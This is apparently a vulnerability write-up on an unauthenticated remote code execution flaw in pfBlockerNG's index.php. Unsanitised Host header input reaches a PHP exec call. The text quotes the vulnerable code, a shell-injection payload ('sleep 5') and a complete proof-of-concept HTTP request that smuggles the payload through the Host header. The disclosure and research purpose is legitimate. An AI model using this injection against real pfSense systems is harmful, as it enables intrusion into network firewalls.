pfBlockerNG is the Next Generation of pfBlocker with the following features:
- Manage IPv4/v6 List Sources into 'Deny, Permit or Match' formats.
- GeoIP database by MaxMind Inc. (GeoLite2 Free version).
- De-Duplication, Suppression, and Reputation enhancements.
- Provision to download from diverse List formats.
- Advanced Integration for Proofpoint ET IQRisk IP Reputation Threat Sources.
- Domain Name (DNSBL) blocking via Unbound DNS Resolver.
pfBlockerNg <2.1.4_27
Unauthenticated remote code execution (RCE)
The query for TLD Block section of index.php
includes an unsanitized/unescaped user input d_query
from the HEADER Host source into the PHP exec function sink.
exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);
// Query for a TLD Block
if (empty($pfb_query)) {
$idparts = explode('.', $query);
$idcnt = (count($idparts) -1);
for ($i=1; $i <= $idcnt; $i++) {
$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);
if (!empty($match[0])) {
$pfb_query = 'DNSBL_TLD';
Requires HTTP access to pfsense web console
Sample payload: ' *; sleep 5; '
POC Request:
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2
I love pfBlockerNg and was inspired by Di r00t's recent CVE-2022-31814 and great writeup and was curious to see if Snyk static application security test (SAST) tool would detect the vulnerability. So I download the respecitive index.php version 2.1.4_26 file and ran Snyk Code against it. Sure enough Snyk detected the vuln plus another similar reporting just a handful of lines later.